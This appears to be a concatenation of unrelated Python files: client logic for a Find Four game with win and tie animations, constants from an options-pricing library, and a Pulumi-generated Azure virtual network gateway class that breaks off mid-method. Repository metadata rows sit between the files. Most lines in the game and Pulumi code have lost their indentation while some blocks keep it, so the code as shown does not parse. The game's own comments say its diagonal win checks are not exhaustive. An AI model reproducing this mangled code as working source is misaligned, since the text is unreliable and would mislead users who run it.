def announceWinnerPosition(self, x, y, winDirection, playerNum):
        self.isMyTurn = False
if self.turnText:
self.turnText.hide()
self.clockNode.stop()
self.clockNode.hide()
if winDirection == 0:
blinkList = self.findHorizontal(x, y, playerNum)
elif winDirection == 1:
blinkList = self.findVertical(x, y, playerNum)
elif winDirection == 2:
blinkList = self.findDiagonal(x, y, playerNum)
if blinkList != []:
print(blinkList)
val0 = x * 7 + y
x = blinkList[0][0]
y = blinkList[0][1]
val1 = x * 7 + y
x = blinkList[1][0]
y = blinkList[1][1]
val2 = x * 7 + y
x = blinkList[2][0]
y = blinkList[2][1]
val3 = x * 7 + y
self.winningSequence = Sequence()
downBlinkerParallel = Parallel(LerpColorInterval(self.locatorList[val0], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[val1], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[val2], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[val3], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)))
upBlinkerParallel = Parallel(LerpColorInterval(self.locatorList[val0], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)), LerpColorInterval(self.locatorList[val1], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)), LerpColorInterval(self.locatorList[val2], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)), LerpColorInterval(self.locatorList[val3], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)))
self.winningSequence.append(downBlinkerParallel)
self.winningSequence.append(upBlinkerParallel)
self.winningSequence.loop()
def tie(self):
self.tieSequence = Sequence(autoFinish=1)
self.clockNode.stop()
self.clockNode.hide()
self.isMyTurn = False
self.moveSequence.finish()
if self.turnText:
self.turnText.hide()
for x in range(41):
self.tieSequence.append(Parallel(LerpColorInterval(self.locatorList[x], 0.15, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[x], 0.15, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5))))
whisper = WhisperPopup('This Find Four game has resulted in a Tie!', OTPGlobals.getInterfaceFont(), WhisperPopup.WTNormal)
whisper.manage(base.marginManager)
self.tieSequence.start()
def hideChildren(self, nodeList):
pass
    def animatePeice(self, tableState, moveCol, movePos, turn):
        messenger.send('wakeup')
        for x in range(6):
            for y in range(7):
                self.board[x][y] = tableState[x][y]
        # Show the falling-piece model for whichever player just moved.
        if turn == 0:
            piece = self.startingPositions[moveCol].getChild(1).getChildren()[2]
        else:
            piece = self.startingPositions[moveCol].getChild(1).getChildren()[3]
        piece.show()
        # Drop the piece from the top of the column to its landing cell,
        # then hide the animated model and redraw the board from self.board.
        self.moveSequence = Sequence()
        startPos = self.startingPositions[moveCol].getPos()
        arrayLoc = movePos * 7 + moveCol
        self.moveSequence.append(LerpPosInterval(self.startingPositions[moveCol], 1.5, self.locatorList[arrayLoc].getPos(self), startPos))
        self.moveSequence.append(Func(piece.hide))
        self.moveSequence.append(Func(self.startingPositions[moveCol].setPos, startPos))
        self.moveSequence.append(Func(self.updateGameState))
        self.moveSequence.start()
def announceWin(self, avId):
self.fsm.request('gameOver')
    def doRandomMove(self):
        if self.isMyTurn:
            if self.moveCol is not None:
                self.d_requestMove(self.moveCol)
                self.moveCol = None
                self.isMyTurn = False
                taskMgr.remove('playerTurnTask')
            else:
                # The turn timer expired with no column picked, so request
                # a move in a random column that still has room.
                hasfound = False
                while not hasfound:
                    x = randint(0, 6)
                    if self.board[0][x] == 0:
                        self.d_requestMove(x)
                        self.moveCol = None
                        self.isMyTurn = False
                        taskMgr.remove('playerTurnTask')
                        hasfound = True
        return
def doNothing(self):
pass
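    # The check*/find* helpers below look for four-in-a-row runs extending
    # from an anchor cell in a single direction. They exploit the fact that
    # every horizontal window of four columns (out of 7) contains one of the
    # columns 2-4, and every vertical window of four rows (out of 6) contains
    # rows 2 and 3, so only a few anchor positions need testing. The diagonal
    # checks anchor at a similar handful of positions and are not exhaustive.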
def checkHorizontal(self, rVal, cVal, playerNum):
if cVal == 3:
for x in range(1, 4):
if self.board[rVal][cVal - x] != playerNum:
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return True
for x in range(1, 4):
if self.board[rVal][cVal + x] != playerNum:
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return True
return False
elif cVal == 2:
for x in range(1, 4):
if self.board[rVal][cVal + x] != playerNum:
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return True
return False
elif cVal == 4:
for x in range(1, 4):
if self.board[rVal][cVal - x] != playerNum:
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return True
return False
else:
return False
    def checkVertical(self, rVal, cVal, playerNum):
        if rVal == 2:
            for x in range(1, 4):
                if self.board[rVal + x][cVal] != playerNum:
                    break
                if self.board[rVal + x][cVal] == playerNum and x == 3:
                    return True
            return False
        elif rVal == 3:
            for x in range(1, 4):
                if self.board[rVal - x][cVal] != playerNum:
                    break
                if self.board[rVal - x][cVal] == playerNum and x == 3:
                    return True
            return False
        elif rVal == 1:
            # Anchoring at row 1 and scanning down covers the remaining
            # vertical window (rows 1-4); anchors at rows 2 and 3 alone
            # only cover the windows 2-5 and 0-3.
            for x in range(1, 4):
                if self.board[rVal + x][cVal] != playerNum:
                    break
                if self.board[rVal + x][cVal] == playerNum and x == 3:
                    return True
            return False
        else:
            return False
def checkDiagonal(self, rVal, cVal, playerNum):
if cVal <= 2:
if rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal + x] != playerNum:
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return True
return False
elif rVal == 3:
for x in range(1, 4):
if self.board[rVal - x][cVal + x] != playerNum:
break
if self.board[rVal - x][cVal + x] == playerNum and x == 3:
return True
return False
elif cVal >= 4:
if rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal - x] != playerNum:
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return True
return False
elif rVal == 3:
for x in range(1, 4):
if self.board[rVal - x][cVal - x] != playerNum:
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return True
return False
        elif rVal == 3 or rVal == 4 or rVal == 5:
            # Scan the up-left diagonal from the middle column...
            for x in range(1, 4):
                if self.board[rVal - x][cVal - x] != playerNum:
                    break
                if self.board[rVal - x][cVal - x] == playerNum and x == 3:
                    return True
            # ...and the up-right diagonal, so wins crossing column 3 in
            # either direction are detected.
            for x in range(1, 4):
                if self.board[rVal - x][cVal + x] != playerNum:
                    break
                if self.board[rVal - x][cVal + x] == playerNum and x == 3:
                    return True
            return False
elif rVal == 0 or rVal == 1 or rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal - x] != playerNum:
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return True
for x in range(1, 4):
if self.board[rVal + x][cVal + x] != playerNum:
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return True
return False
return False
def findHorizontal(self, rVal, cVal, playerNum):
if cVal == 3:
retList = []
for x in range(1, 4):
retList.append([rVal, cVal - x])
if self.board[rVal][cVal - x] != playerNum:
retList = []
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return retList
for x in range(1, 4):
retList.append([rVal, cVal + x])
if self.board[rVal][cVal + x] != playerNum:
retList = []
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return retList
return []
elif cVal == 2:
retList = []
for x in range(1, 4):
retList.append([rVal, cVal + x])
if self.board[rVal][cVal + x] != playerNum:
retList = []
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return retList
return []
elif cVal == 4:
retList = []
for x in range(1, 4):
retList.append([rVal, cVal - x])
if self.board[rVal][cVal - x] != playerNum:
retList = []
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return retList
return []
else:
return []
def findVertical(self, rVal, cVal, playerNum):
if rVal == 2:
retList = []
for x in range(1, 4):
retList.append([rVal + x, cVal])
if self.board[rVal + x][cVal] != playerNum:
retList = []
break
if self.board[rVal + x][cVal] == playerNum and x == 3:
return retList
return []
elif rVal == 3:
retList = []
for x in range(1, 4):
retList.append([rVal - x, cVal])
if self.board[rVal - x][cVal] != playerNum:
retList = []
break
if self.board[rVal - x][cVal] == playerNum and x == 3:
return retList
return []
        elif rVal == 1:
            # Companion to the row-1 anchor in checkVertical: collect the
            # winning cells for a run occupying rows 1-4.
            retList = []
            for x in range(1, 4):
                retList.append([rVal + x, cVal])
                if self.board[rVal + x][cVal] != playerNum:
                    retList = []
                    break
                if self.board[rVal + x][cVal] == playerNum and x == 3:
                    return retList
            return []
        else:
            return []
def findDiagonal(self, rVal, cVal, playerNum):
retList = []
if cVal <= 2:
if rVal == 2:
for x in range(1, 4):
retList.append([rVal + x, cVal + x])
if self.board[rVal + x][cVal + x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return retList
return []
elif rVal == 3:
for x in range(1, 4):
retList.append([rVal - x, cVal + x])
if self.board[rVal - x][cVal + x] != playerNum:
retList = []
break
if self.board[rVal - x][cVal + x] == playerNum and x == 3:
return retList
return []
elif cVal >= 4:
if rVal == 2:
for x in range(1, 4):
retList.append([rVal + x, cVal - x])
if self.board[rVal + x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return retList
return []
elif rVal == 3:
for x in range(1, 4):
retList.append([rVal - x, cVal - x])
if self.board[rVal - x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return retList
return []
        elif rVal == 3 or rVal == 4 or rVal == 5:
            for x in range(1, 4):
                retList.append([rVal - x, cVal - x])
                if self.board[rVal - x][cVal - x] != playerNum:
                    retList = []
                    break
                if self.board[rVal - x][cVal - x] == playerNum and x == 3:
                    return retList
            for x in range(1, 4):
                # Up-right diagonal, mirroring checkDiagonal; indexing with
                # rVal - x keeps the scan on the board for rows 3-5.
                retList.append([rVal - x, cVal + x])
                if self.board[rVal - x][cVal + x] != playerNum:
                    retList = []
                    break
                if self.board[rVal - x][cVal + x] == playerNum and x == 3:
                    return retList
            return []
elif rVal == 0 or rVal == 1 or rVal == 2:
for x in range(1, 4):
retList.append([rVal + x, cVal - x])
if self.board[rVal + x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return retList
for x in range(1, 4):
retList.append([rVal + x, cVal + x])
if self.board[rVal + x][cVal + x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return retList
return []
return []
|
886a07773cfa0af38e4179a5fe327f737d0c65bb
|
159bfe57c3c1fc8fdbe0299233ec3060710f0da0
|
/wallstreet/constants.py
|
87e691cb6e26eadd49bd1bbae5b372d175aadb87
|
[
"MIT"
] |
permissive
|
mcdallas/wallstreet
|
fc42df4ccc571231b87cdcbca3fd582c9f915c25
|
c34514387e181f9a752375431c4382466432fa05
|
refs/heads/master
| 2023-01-04T01:00:58.625199
| 2022-12-30T12:34:16
| 2022-12-30T12:34:16
| 50,063,599
| 1,153
| 212
|
MIT
| 2022-12-30T12:32:40
| 2016-01-20T22:03:39
|
Python
|
UTF-8
|
Python
| false
| false
| 403
|
py
|
constants.py
|
DATE_FORMAT = '%d-%m-%Y'
DATETIME_FORMAT = '%e %b %Y %H:%M:%S'
TREASURY_URL = "https://home.treasury.gov/sites/default/files/interest-rates/yield.xml"
DELTA_DIFFERENTIAL = 1.e-3
VEGA_DIFFERENTIAL = 1.e-4
GAMMA_DIFFERENTIAL = 1.e-3
RHO_DIFFERENTIAL = 1.e-4
THETA_DIFFERENTIAL = 1.e-5
IMPLIED_VOLATILITY_TOLERANCE = 1.e-6
SOLVER_STARTING_VALUE = 0.27
OVERNIGHT_RATE = 0
FALLBACK_RISK_FREE_RATE = 0.02
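# Illustrative sketch (not part of this module): the *_DIFFERENTIAL values
# above are natural step sizes for finite-difference Greeks. For a
# hypothetical pricing helper price(spot), a central-difference delta could
# be computed as:
#
#   h = DELTA_DIFFERENTIAL * spot
#   delta = (price(spot + h) - price(spot - h)) / (2 * h)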
|
ec683a6630fb4537d01602729decade17009c602
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/network/v20190801/virtual_network_gateway.py
|
a3c346fb87f22f4729298cadfea9e560c6bd116a
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 34,471
|
py
|
virtual_network_gateway.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkGatewayInitArgs', 'VirtualNetworkGateway']
@pulumi.input_type
class VirtualNetworkGatewayInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
active_active: Optional[pulumi.Input[bool]] = None,
bgp_settings: Optional[pulumi.Input['BgpSettingsArgs']] = None,
custom_routes: Optional[pulumi.Input['AddressSpaceArgs']] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_dns_forwarding: Optional[pulumi.Input[bool]] = None,
gateway_default_site: Optional[pulumi.Input['SubResourceArgs']] = None,
gateway_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['VirtualNetworkGatewaySkuArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_network_gateway_name: Optional[pulumi.Input[str]] = None,
vpn_client_configuration: Optional[pulumi.Input['VpnClientConfigurationArgs']] = None,
vpn_gateway_generation: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]] = None,
vpn_type: Optional[pulumi.Input[Union[str, 'VpnType']]] = None):
"""
The set of arguments for constructing a VirtualNetworkGateway resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[bool] active_active: ActiveActive flag.
:param pulumi.Input['BgpSettingsArgs'] bgp_settings: Virtual network gateway's BGP speaker settings.
:param pulumi.Input['AddressSpaceArgs'] custom_routes: The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
:param pulumi.Input[bool] enable_bgp: Whether BGP is enabled for this virtual network gateway or not.
:param pulumi.Input[bool] enable_dns_forwarding: Whether dns forwarding is enabled or not.
:param pulumi.Input['SubResourceArgs'] gateway_default_site: The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayType']] gateway_type: The type of this virtual network gateway.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]] ip_configurations: IP configurations for virtual network gateway.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_guid: The resource GUID property of the virtual network gateway resource.
:param pulumi.Input['VirtualNetworkGatewaySkuArgs'] sku: The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] virtual_network_gateway_name: The name of the virtual network gateway.
:param pulumi.Input['VpnClientConfigurationArgs'] vpn_client_configuration: The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
:param pulumi.Input[Union[str, 'VpnGatewayGeneration']] vpn_gateway_generation: The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
:param pulumi.Input[Union[str, 'VpnType']] vpn_type: The type of this virtual network gateway.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if active_active is not None:
pulumi.set(__self__, "active_active", active_active)
if bgp_settings is not None:
pulumi.set(__self__, "bgp_settings", bgp_settings)
if custom_routes is not None:
pulumi.set(__self__, "custom_routes", custom_routes)
if enable_bgp is not None:
pulumi.set(__self__, "enable_bgp", enable_bgp)
if enable_dns_forwarding is not None:
pulumi.set(__self__, "enable_dns_forwarding", enable_dns_forwarding)
if gateway_default_site is not None:
pulumi.set(__self__, "gateway_default_site", gateway_default_site)
if gateway_type is not None:
pulumi.set(__self__, "gateway_type", gateway_type)
if id is not None:
pulumi.set(__self__, "id", id)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
if location is not None:
pulumi.set(__self__, "location", location)
if resource_guid is not None:
pulumi.set(__self__, "resource_guid", resource_guid)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_network_gateway_name is not None:
pulumi.set(__self__, "virtual_network_gateway_name", virtual_network_gateway_name)
if vpn_client_configuration is not None:
pulumi.set(__self__, "vpn_client_configuration", vpn_client_configuration)
if vpn_gateway_generation is not None:
pulumi.set(__self__, "vpn_gateway_generation", vpn_gateway_generation)
if vpn_type is not None:
pulumi.set(__self__, "vpn_type", vpn_type)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="activeActive")
def active_active(self) -> Optional[pulumi.Input[bool]]:
"""
ActiveActive flag.
"""
return pulumi.get(self, "active_active")
@active_active.setter
def active_active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active_active", value)
@property
@pulumi.getter(name="bgpSettings")
def bgp_settings(self) -> Optional[pulumi.Input['BgpSettingsArgs']]:
"""
Virtual network gateway's BGP speaker settings.
"""
return pulumi.get(self, "bgp_settings")
@bgp_settings.setter
def bgp_settings(self, value: Optional[pulumi.Input['BgpSettingsArgs']]):
pulumi.set(self, "bgp_settings", value)
@property
@pulumi.getter(name="customRoutes")
def custom_routes(self) -> Optional[pulumi.Input['AddressSpaceArgs']]:
"""
The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
"""
return pulumi.get(self, "custom_routes")
@custom_routes.setter
def custom_routes(self, value: Optional[pulumi.Input['AddressSpaceArgs']]):
pulumi.set(self, "custom_routes", value)
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> Optional[pulumi.Input[bool]]:
"""
Whether BGP is enabled for this virtual network gateway or not.
"""
return pulumi.get(self, "enable_bgp")
@enable_bgp.setter
def enable_bgp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_bgp", value)
@property
@pulumi.getter(name="enableDnsForwarding")
def enable_dns_forwarding(self) -> Optional[pulumi.Input[bool]]:
"""
Whether dns forwarding is enabled or not.
"""
return pulumi.get(self, "enable_dns_forwarding")
@enable_dns_forwarding.setter
def enable_dns_forwarding(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_dns_forwarding", value)
@property
@pulumi.getter(name="gatewayDefaultSite")
def gateway_default_site(self) -> Optional[pulumi.Input['SubResourceArgs']]:
"""
The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
"""
return pulumi.get(self, "gateway_default_site")
@gateway_default_site.setter
def gateway_default_site(self, value: Optional[pulumi.Input['SubResourceArgs']]):
pulumi.set(self, "gateway_default_site", value)
@property
@pulumi.getter(name="gatewayType")
def gateway_type(self) -> Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "gateway_type")
@gateway_type.setter
def gateway_type(self, value: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]]):
pulumi.set(self, "gateway_type", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]]]:
"""
IP configurations for virtual network gateway.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> Optional[pulumi.Input[str]]:
"""
The resource GUID property of the virtual network gateway resource.
"""
return pulumi.get(self, "resource_guid")
@resource_guid.setter
def resource_guid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_guid", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['VirtualNetworkGatewaySkuArgs']]:
"""
The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['VirtualNetworkGatewaySkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualNetworkGatewayName")
def virtual_network_gateway_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the virtual network gateway.
"""
return pulumi.get(self, "virtual_network_gateway_name")
@virtual_network_gateway_name.setter
def virtual_network_gateway_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_gateway_name", value)
@property
@pulumi.getter(name="vpnClientConfiguration")
def vpn_client_configuration(self) -> Optional[pulumi.Input['VpnClientConfigurationArgs']]:
"""
The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
"""
return pulumi.get(self, "vpn_client_configuration")
@vpn_client_configuration.setter
def vpn_client_configuration(self, value: Optional[pulumi.Input['VpnClientConfigurationArgs']]):
pulumi.set(self, "vpn_client_configuration", value)
@property
@pulumi.getter(name="vpnGatewayGeneration")
def vpn_gateway_generation(self) -> Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]]:
"""
The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
"""
return pulumi.get(self, "vpn_gateway_generation")
@vpn_gateway_generation.setter
def vpn_gateway_generation(self, value: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]]):
pulumi.set(self, "vpn_gateway_generation", value)
@property
@pulumi.getter(name="vpnType")
def vpn_type(self) -> Optional[pulumi.Input[Union[str, 'VpnType']]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "vpn_type")
@vpn_type.setter
def vpn_type(self, value: Optional[pulumi.Input[Union[str, 'VpnType']]]):
pulumi.set(self, "vpn_type", value)
class VirtualNetworkGateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active_active: Optional[pulumi.Input[bool]] = None,
bgp_settings: Optional[pulumi.Input[pulumi.InputType['BgpSettingsArgs']]] = None,
custom_routes: Optional[pulumi.Input[pulumi.InputType['AddressSpaceArgs']]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_dns_forwarding: Optional[pulumi.Input[bool]] = None,
gateway_default_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
gateway_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewaySkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_network_gateway_name: Optional[pulumi.Input[str]] = None,
vpn_client_configuration: Optional[pulumi.Input[pulumi.InputType['VpnClientConfigurationArgs']]] = None,
vpn_gateway_generation: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]] = None,
vpn_type: Optional[pulumi.Input[Union[str, 'VpnType']]] = None,
__props__=None):
"""
A common class for general resource information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] active_active: ActiveActive flag.
:param pulumi.Input[pulumi.InputType['BgpSettingsArgs']] bgp_settings: Virtual network gateway's BGP speaker settings.
:param pulumi.Input[pulumi.InputType['AddressSpaceArgs']] custom_routes: The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
:param pulumi.Input[bool] enable_bgp: Whether BGP is enabled for this virtual network gateway or not.
:param pulumi.Input[bool] enable_dns_forwarding: Whether dns forwarding is enabled or not.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] gateway_default_site: The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayType']] gateway_type: The type of this virtual network gateway.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayIPConfigurationArgs']]]] ip_configurations: IP configurations for virtual network gateway.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] resource_guid: The resource GUID property of the virtual network gateway resource.
:param pulumi.Input[pulumi.InputType['VirtualNetworkGatewaySkuArgs']] sku: The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] virtual_network_gateway_name: The name of the virtual network gateway.
:param pulumi.Input[pulumi.InputType['VpnClientConfigurationArgs']] vpn_client_configuration: The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
:param pulumi.Input[Union[str, 'VpnGatewayGeneration']] vpn_gateway_generation: The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
:param pulumi.Input[Union[str, 'VpnType']] vpn_type: The type of this virtual network gateway.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualNetworkGatewayInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A common class for general resource information.
:param str resource_name: The name of the resource.
:param VirtualNetworkGatewayInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualNetworkGatewayInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active_active: Optional[pulumi.Input[bool]] = None,
bgp_settings: Optional[pulumi.Input[pulumi.InputType['BgpSettingsArgs']]] = None,
custom_routes: Optional[pulumi.Input[pulumi.InputType['AddressSpaceArgs']]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_dns_forwarding: Optional[pulumi.Input[bool]] = None,
gateway_default_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
gateway_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualNetworkGatewayIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['VirtualNetworkGatewaySkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_network_gateway_name: Optional[pulumi.Input[str]] = None,
vpn_client_configuration: Optional[pulumi.Input[pulumi.InputType['VpnClientConfigurationArgs']]] = None,
vpn_gateway_generation: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]] = None,
vpn_type: Optional[pulumi.Input[Union[str, 'VpnType']]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
